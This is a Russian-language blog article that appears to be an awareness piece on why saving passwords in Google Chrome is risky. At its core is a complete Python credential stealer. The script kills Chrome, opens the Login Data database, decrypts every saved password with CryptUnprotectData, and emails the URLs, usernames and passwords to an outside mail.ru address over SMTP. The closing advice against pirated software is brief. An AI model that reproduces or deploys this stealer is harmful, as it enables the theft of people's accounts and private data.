Как хакеры взламывают аккаунты, крадут пароли с браузера
Ramas, 2019-09-19

Как хакеры взламывают аккаунты, крадут пароли с браузера

Приветствую всех, это моя первая статья, и я не очень хорошо умею излагать свою мысль текстом, поэтому заранее прошу прошения если что-то было не понятно.

Затрону я такую тему как информационная безопасность, а именно безопасность браузера Google Chrome, объясню и продемонстрирую почему не строит сохранять пароли в браузере, и как защитить свои данный.

Невозможно защитить информацию, если не знать, как ее могут украсть.

Начнем. Как многим уже известно в браузере Chrome есть функция позволяющая сохранять пароли которые вы вводите при входе на различные сайты, это очень сильно облегчает серфинг в интернете, но не многие знают что эти данные храниться в базе Login Date, находиться она в папке

%localappdata%\Google\Chrome\User Data\Default. Login Data

Многие злоумышленники пользуются этим, им не составит труда украсть содержимое базы и узнать все сохранённые логины и паролями с ваших сайтов.

Руководитель группы разработчиков Google Chrome Джастин Шух (Justin Schuh) высказал свое мнение по поводу этого:

Представьте, что злоумышленник получил доступ к вашей учетной записи на компьютере. Он может скопировать все сохраненные сессии и весь журнал вашего браузера, установить любые плагины и расширения для перехвата всего вашего интернет-трафика и даже напичкать вашу операционную систему троянами и скрытыми программами мониторинга.
Я считаю, что игра проиграна уже в тот момент, когда злоумышленник получил доступ к вашему компьютеру под вашей учетной записью. Дальнейшее сопротивление просто бессмысленно – он получил все козырные карты.

Джастин Шух (Justin Schuh) с одной стороны прав, хоть даже если вы не сохраняете пароли, а у злоумышленника есть доступ к вашему компьютеру, то он все ровно сможет с помощью плагинов и программ перехватить весь ваш трафик.

С другой стороны, злоумышленнику намного проще получить именно сохранённые пароли, чем пытаться перехватить трафик по HTTPS протоколу, покажу почему.

В интернете есть куча готовых скриптов с помощью которых можно без проблем открыть базу Login Data и просмотреть его содержимое, вот один из них на GitHub написанный на Python.

chrome_extract.py github

Не нужно быть Senior разработчиком, что бы после небольших изменений превратить этот простенький скрипт в опасную программу, которая после запуска будет не отображать, а отправлять данные на сервер или почту злоумышленника.

Пример скрипта
def MY_SMTP(login_pass):
    msg = MIMEMultipart('alternative')
    msg['Subject'] = "Google"
    msg['From'] = my_mail
    msg['To'] = my_mail
    html = """<html><body>{}</body></html>""".format('<br>'.join(login_pass))
    part2 = MIMEText(html, 'html')
    msg.attach(part2)
    mail = smtplib.SMTP('smtp.mail.ru', 587)
    mail.ehlo()
    mail.starttls()
    mail.login('@mail.ru', 'password')
    mail.sendmail('@mail.ru', '@mail.ru', msg.as_string())
    mail.quit()

def killproc(): 
    PROCNAME = "chrome.exe"
    for proc in psutil.process_iter():
        if proc.name() == PROCNAME:
            proc.kill()
def LoginData():
    killproc()
    PASS_LOGIN = []
    conn = sqlite3.connect(getenv("APPDATA") + "\\..\\Local\\Google\\Chrome\\User Data\\Default\\Login Data")
    cursor = conn.cursor()
    cursor.execute('SELECT action_url, username_value, password_value FROM logins')
    for result in cursor.fetchall():
        password = win32crypt.CryptUnprotectData(result[2], None, None, None, 0)[1]
        if password:
            PASS_LOGIN.append('URL:{}, | {}:{} | '.format(result[0],result[1],password.decode('utf-8')))
    MY_SMTP(PASS_LOGIN)
LoginData()

Если вы думаете, что защищены антивирусной программой или групповой политикой, что такой скрипт не попадёт на ваш компьютер, то это не так. Давно не секрет что многие пользователи не хотят платить и используют пиратское программное обеспечение, этим и пользуются большинство хакеров. Они заражают популярные программы и загружают их в сеть, вы сами не поймете того что заразили свой компьютер.

Согласно исследованию, порядка 62% организаций в России используют нелицензионное программное обеспечение.

Можно сделать вывод, что не стоит доверять пиратским программам, и сохранять пароли с сервисов где хвалиться полезная информация для злоумышленника, тем более если вы работаете в организации.

Тест)
Ответ написан 2019-10-06

Чтобы оставить комментарий Вам необходимо зарегистрироваться или войти